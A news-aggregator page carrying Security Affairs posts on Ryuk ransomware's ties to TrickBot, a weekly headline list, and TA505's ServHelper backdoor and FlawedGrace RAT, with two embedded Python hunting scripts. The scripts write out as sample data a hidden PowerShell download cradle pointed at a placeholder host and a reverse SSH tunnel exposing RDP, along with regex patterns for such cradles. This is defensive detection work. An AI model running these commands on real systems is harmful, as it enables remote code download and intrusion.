Zicutake USA Comment | Search Articles




Which is the link between Ryuk ransomware and TrickBot?

Posted: 13 Jan 2019 09:43 PM PST

FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.

In August 2018, security experts from Check Point uncovered a ransomware campaign aimed at organizations around the world, which they attributed at the time to a North Korea-linked threat actor. It was the first time a security firm had detected the Ryuk ransomware.

The campaign appeared targeted and well planned: the threat actors hit several enterprises and, in each infected company, encrypted hundreds of PCs, storage systems and data centers.

Some organizations paid an exceptionally large ransom to retrieve their encrypted files; Check Point confirmed that the ransoms paid by the victims ranged from 15 BTC to 50 BTC.

At least three organizations, in the United States and elsewhere, were severely affected, and the attackers are estimated to have netted over $640,000.

The Ryuk ransomware shares code with the Hermes ransomware, which has been associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that disrupted the printing and distribution of several major US newspapers, including the Wall Street Journal, the New York Times and the Los Angeles Times.

Further investigation of the malware led experts at FireEye and CrowdStrike to conclude that the threat actors behind Ryuk are working with another cybercrime gang to gain access to target networks: the operators of TrickBot, a banking trojan that, once it has infected a system, gives the attackers a reverse shell from which they can break into the rest of the network.

Experts at CrowdStrike believe the Ryuk ransomware is operated by a crime group they track as GRIM SPIDER, which they assess to be a cell of the Russia-based WIZARD SPIDER, the group behind TrickBot.

“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as "big game hunting," signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by CrowdStrike.

“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”

FireEye tracks the same financially motivated activity as TEMP.MixMaster, a label covering the incidents in which Ryuk was deployed following a TrickBot infection.

This suggests that the TrickBot operators are adopting a crime-as-a-service model, selling access to systems they have previously compromised.

“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations.”

TrickBot is distributed through massive spam campaigns, or it is dropped by Emotet, which is itself distributed through malspam.

FireEye experts observed a malspam campaign in the TEMP.MixMaster activity that used messages pretending to be a Deloitte payroll schedule.

“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.

“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign's broad distribution both geographically and across industry verticals.”

Once inside the network, the attackers used the PowerShell post-exploitation framework Empire to distribute their payloads across the hosts they could reach.

Empire lets the operators harvest credentials, pivot to other computers in the network and finally install the Ryuk ransomware on them.
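As an added illustration of the delivery chain described above (macro-enabled document, hidden PowerShell download cradle, Empire-style launcher), the following Python script scores Sysmon-style process-creation events for that pattern. It is not FireEye's or CrowdStrike's tooling; the events, command lines and stager URL (example.invalid) are constructed for the example and are not samples from the TEMP.MixMaster campaign.

```python
"""Hunt for the macro -> hidden PowerShell -> download-cradle chain.

Added example: constructed events that mimic Sysmon Event ID 1 fields,
not data from the TEMP.MixMaster campaign. The stager URL is a
placeholder (example.invalid).
"""
import base64
import re
import shlex

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings typical of Empire-style launchers and download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|\bIEX\b|Invoke-Expression",
    re.IGNORECASE)
# Common spellings of -EncodedCommand (PowerShell accepts unambiguous prefixes).
ENC_FLAG = re.compile(r"^-(e|ec|en|enc|encodedcommand)$", re.IGNORECASE)
# Flags that hide the window, skip the profile or bypass execution policy.
HIDE_FLAGS = re.compile(
    r"-(w|win|window|windowstyle)\s+hidden|-nop\b|-noni\b|-(ep|executionpolicy)\s+bypass",
    re.IGNORECASE)


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if absent/invalid."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if ENC_FLAG.match(flag):
            blob = value.strip("\"'")
            try:
                raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def assess(event):
    """Score one process-creation event; returns (score, reasons)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    reasons = []
    if image not in {"powershell.exe", "pwsh.exe"}:
        return 0, reasons
    if parent in OFFICE_PARENTS:
        reasons.append("spawned by Office application " + parent)
    if HIDE_FLAGS.search(cmd):
        reasons.append("hidden window / no-profile / policy-bypass flags")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("base64 -EncodedCommand payload")
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("download cradle inside decoded script")
    elif DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle on the command line")
    return len(reasons), reasons


def hunt(events, threshold=2):
    """Return [(ProcessId, reasons)] for events scoring at least threshold."""
    hits = []
    for event in events:
        score, reasons = assess(event)
        if score >= threshold:
            hits.append((event["ProcessId"], reasons))
    return hits


# Constructed stager: the classic one-line cradle an Empire launcher wraps.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

SAMPLE_EVENTS = [  # constructed Sysmon-style events, not real telemetry
    {"ProcessId": 1001, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_ps(STAGER)},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"ProcessId": 1003, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "' + STAGER + '"'},
]

if __name__ == "__main__":
    for pid, why in hunt(SAMPLE_EVENTS):
        print(pid, "; ".join(why))
```

The scoring deliberately separates the parent-process signal from the command-line signals: a hidden, encoded PowerShell spawned from cmd.exe (as Empire does once it has a foothold) still scores, while an analyst's interactive `Get-Date` does not.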

The investigations conducted by FireEye, CrowdStrike and McAfee appear to rule out a link between Ryuk and North Korea; the experts believe the threat actors behind the ransomware operate from Russia.

According to McAfee, the initial attribution to North Korea may be wrong because it rested only on the code similarities between Ryuk and Hermes. The experts pointed out that in August 2017 the Hermes ransomware was being sold on the Exploit.in underground forum by a Russian-speaking actor.

The Lazarus Group likely bought the ransomware and used it in its own operations, which is what makes attribution of later Hermes-derived samples so difficult.

Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)

The post Which is the link between Ryuk ransomware and TrickBot? appeared first on Security Affairs.

Security Affairs newsletter Round 196 – News of the week

Posted: 13 Jan 2019 07:43 AM PST

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: a 20% discount on both the Kindle edition and the paper copy.

Once again thank you!

Blur data leak potentially exposed data of 2.4 Million users
Dark Overlord hacking crew publishes first batch of confidential 9/11 files
Australian Early Warning Network hacked and used to send fake alerts
Hackers have stolen customer data from Titan Manufacturing and Distributing company for nearly one year
NSA will reveal its GHIDRA Reverse Engineering tool at RSA Conference
ReiKey app for macOS can detect Mac Keyloggers using event taps
Coinbase suspended Ethereum Classic (ETC) trading after a successful 51% attack
German youngster behind massive data leak of German politicians data
Nine 2019 Cybersecurity Predictions
Tens of thousands of hot tubs are exposed to hack
Zerodium offers $2 Million for remote iOS jailbreaks, and much more
Adobe addresses Important flaws in Connect, Digital Editions
First Google security patches for Android in 2019 fix a critical flaw
Microsoft January 2019 Patch Tuesday updates fix 7 critical vulnerabilities
State attorneys general announced a $1.5 million settlement with Neiman Marcus
Alleged Iran-linked APT groups behind global DNS Hijacking campaign
CISCO addresses DoS bugs in CISCO ESA products
Ironic turn … Kaspersky Labs helped NSA to catch alleged data thief
Three security bugs found in the popular Linux suite systemd
British hacker sentenced to jail for attack on Liberian Telecoms firms
Reddit locked Down accounts due to alleged security breach
The AVE_MARIA Malware
Victims of Pylocky ransomware can decrypt their files for free
Hacktivist Martin Gottesfeld sentenced to 10 years in prison for hospital cyberattack
Rapid7 announced the release of Metasploit 5.0
Z-WASP attack: hackers used Zero-Width spaces to bypass Office 365 protections

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 196 – News of the week appeared first on Security Affairs.

TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal

Posted: 13 Jan 2019 06:42 AM PST

Proofpoint analyzed two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.

Security researchers at Proofpoint discovered two strains of malware, tracked as ServHelper and FlawedGrace, distributed through phishing campaigns run by the TA505 crime gang.

ServHelper is a backdoor of which the experts analyzed two variants, while FlawedGrace is a remote access trojan (RAT).

“In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing  a new backdoor we named "ServHelper". ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader.” reads the analysis published by Proofpoint.

“Additionally we have observed the downloader variant download a malware we call "FlawedGrace." FlawedGrace is a full-featured RAT that we first observed in November 2017.”

The TA505 group was first named by Proofpoint back in 2017; it has been active since at least 2015 and targets organizations in the financial and retail industries.

The group has carried out a large number of campaigns using weaponized Office and PDF documents to deliver well-known malware, including the Dridex banking trojan, the tRAT and FlawedAmmyy RATs, and the Philadelphia, GlobeImposter and Locky ransomware families.

In November, experts observed several campaigns carried out by the TA505 group; in three of them the threat actors delivered the ServHelper malware. The ServHelper backdoor is written in Delphi and, according to the experts, its developers keep updating it with new features: almost every new campaign used a new variant of the malware.

One of the largest campaigns distributed tens of thousands of emails and leveraged weaponized .DOC, .PUB, and .WIZ documents.


On December 13, Proofpoint observed a third campaign spreading the ServHelper backdoor.

“On December 13, 2018, we observed another large ServHelper "downloader" campaign targeting retail and financial services customers.” reads the analysis published by Proofpoint.

“The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake "Adobe PDF Plugin" webpage linking to the malware, and direct URLs in the email body linking to a ServHelper executable.”

The attacks delivering the two malware families were not targeted in nature; the attackers went after financial services organizations worldwide.

Once running, the ServHelper backdoor sets up reverse SSH tunnels that let the attackers reach the infected system over Remote Desktop Protocol (RDP) on port 3389, even though that port is not exposed to the internet.

“As noted, there are two distinct variants of ServHelper: a "tunnel" variant and a "downloader" variant. The "tunnel" variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP).” continues Proofpoint.

“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to "hijack" legitimate user accounts or their web browser profiles and use them as they see fit,”

Experts also discovered a second ServHelper variant that lacks the tunneling and hijacking capabilities; in this case the backdoor was used only as a downloader for the FlawedGrace RAT.

The threat actors use the .bit Top-Level Domain (TLD) for their command-and-control (C2) domains. Support for .bit C2 domains was added to protect the C2 infrastructure: the TLD belongs to the Namecoin blockchain-based naming system and cannot be resolved through ordinary DNS, so the malware has to query special DNS servers that support it (the observed C2 domains were dedsolutions[.]bit and arepos[.]bit).

Because the .bit TLD is not controlled by ICANN, there is no registry or registrar that can be asked to shut down a fraudulent domain used as C2.
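An added detection example, not Proofpoint's tooling, covering the two ServHelper behaviours described above: the reverse SSH tunnel that exposes the victim's RDP port, and C2 resolution through the Namecoin .bit namespace. The process and DNS events are constructed; the ssh/plink command line uses the generic OpenSSH `-R` reverse-forward syntax, which is an assumption about how such a tunnel would appear on a host and not a ServHelper sample, and the corporate resolver address 10.0.0.53 is made up. The two .bit names are the C2 domains Proofpoint reported.

```python
"""Flag ServHelper-style host behaviour: a reverse SSH tunnel that exposes
RDP, and C2 lookups in the Namecoin .bit namespace.

Added example with constructed process and DNS events; not Proofpoint's
code. The ssh/plink syntax is the generic OpenSSH -R form (an assumption),
and 10.0.0.53 is a made-up corporate resolver.
"""
import re

SSH_CLIENTS = {"ssh.exe", "plink.exe", "ssh"}
RDP_PORT = 3389
# -R [bind_address:]port:host:hostport  (OpenSSH / plink reverse forward)
REVERSE_FWD = re.compile(r"-R\s*(?:\S+?:)?(\d+):(\S+?):(\d+)\b")
CORPORATE_RESOLVERS = {"10.0.0.53"}   # assumption: the only sanctioned resolver
BLOCKCHAIN_TLDS = (".bit",)           # Namecoin namespace, not delegated by ICANN


def reverse_rdp_tunnel(image, cmdline):
    """Return (remote_port, forwarded_host) when an SSH client is started
    with a reverse forward whose target port is RDP, else None."""
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in SSH_CLIENTS:
        return None
    m = REVERSE_FWD.search(cmdline)
    if m and int(m.group(3)) == RDP_PORT:
        return int(m.group(1)), m.group(2)
    return None


def dns_reasons(query_name, resolver):
    """Reasons a DNS query fits the .bit C2 pattern (empty list if none)."""
    reasons = []
    name = query_name.lower().rstrip(".")
    if name.endswith(BLOCKCHAIN_TLDS):
        reasons.append("lookup of blockchain-namespace name " + name)
    if resolver not in CORPORATE_RESOLVERS:
        # .bit cannot resolve via the corporate resolver, so the malware
        # must talk to a resolver of its own choosing.
        reasons.append("query sent to non-corporate resolver " + resolver)
    return reasons


def triage(events):
    """Return [(host, reason)] over a mixed list of process and DNS events."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            hit = reverse_rdp_tunnel(ev["Image"], ev["CommandLine"])
            if hit:
                findings.append((ev["Host"],
                                 f"reverse SSH tunnel exposes RDP ({hit[1]}:{RDP_PORT}) "
                                 f"on remote port {hit[0]}"))
        elif ev["type"] == "dns":
            for reason in dns_reasons(ev["QueryName"], ev["Resolver"]):
                findings.append((ev["Host"], reason))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, not from a real incident
    {"type": "process", "Host": "WS-01", "Image": r"C:\ProgramData\sh\ssh.exe",
     "CommandLine": "ssh.exe -N -o StrictHostKeyChecking=no "
                    "-R 0.0.0.0:2222:127.0.0.1:3389 tun@198.51.100.20"},
    {"type": "process", "Host": "WS-02", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -L 8080:intranet.corp.local:80 admin@bastion.corp.local"},
    {"type": "dns", "Host": "WS-01", "QueryName": "dedsolutions.bit", "Resolver": "198.51.100.5"},
    {"type": "dns", "Host": "WS-01", "QueryName": "arepos.bit", "Resolver": "198.51.100.5"},
    {"type": "dns", "Host": "WS-03", "QueryName": "www.example.com", "Resolver": "10.0.0.53"},
]

if __name__ == "__main__":
    for host, reason in triage(SAMPLE_EVENTS):
        print(host, reason)
```

A legitimate local forward (`-L`, WS-02) is left alone; what matters for this backdoor is the `-R` direction, which turns the attacker's server into the RDP entry point for a host that has no inbound exposure. The DNS check fires twice per .bit lookup on purpose: the name itself and the fact that it had to bypass the sanctioned resolver are independent signals, and the second one also catches later C2 domains you do not yet know.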

The TA505 group also uses the FlawedGrace RAT; the malware is written in C++, and according to Proofpoint its coding style and the techniques it implements suggest that the RAT and ServHelper were developed by different teams.

“Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace.” concluded Proofpoint.

“This also extends the trend that emerged in 2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATS, and other malware that can remain resident on victim devices for far longer than destructive, "smash and grab" malware like ransomware.”

Pierluigi Paganini

(SecurityAffairs – TA505, cybercrime)

The post TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal appeared first on Security Affairs.